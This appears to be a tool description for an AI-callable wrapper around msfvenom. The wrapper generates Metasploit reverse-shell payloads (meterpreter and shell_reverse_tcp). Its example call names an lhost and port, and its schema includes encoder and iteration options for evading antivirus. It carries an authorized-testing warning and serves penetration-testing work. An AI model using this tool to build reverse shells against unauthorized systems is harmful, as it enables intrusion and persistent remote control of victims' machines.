kali_exploit_msfvenom_generate
Generate custom Metasploit payloads for authorized security testing by specifying payload type, target host/port, and output format.
Instructions
Generate custom payloads for Metasploit Framework.
Msfvenom is a payload generator and encoder combining msfpayload and msfencode.
WARNING: Only use generated payloads for authorized security testing.
Common Payloads:
windows/meterpreter/reverse_tcp
linux/x64/shell_reverse_tcp
php/meterpreter/reverse_tcp
Example:
payload="linux/x64/shell_reverse_tcp", lhost="192.168.1.100", lport=4444, format="elf"
Input Schema
TableJSON Schema
| Name | Required | Description | Default |
|---|---|---|---|
| payload | Yes | Payload type (e.g., 'windows/meterpreter/reverse_tcp', 'linux/x64/shell_reverse_tcp') | |
| lhost | Yes | Local host IP for reverse connections | |
| lport | Yes | Local port for reverse connections | |
| format | No | Output format | raw |
| arch | No | Target architecture | |
| platform | No | Target platform | |
| encoder | No | Encoder to use (e.g., 'x86/shikata_ga_nai') | |
| iterations | No | Number of encoding iterations | |
| output_file | No | Output file path |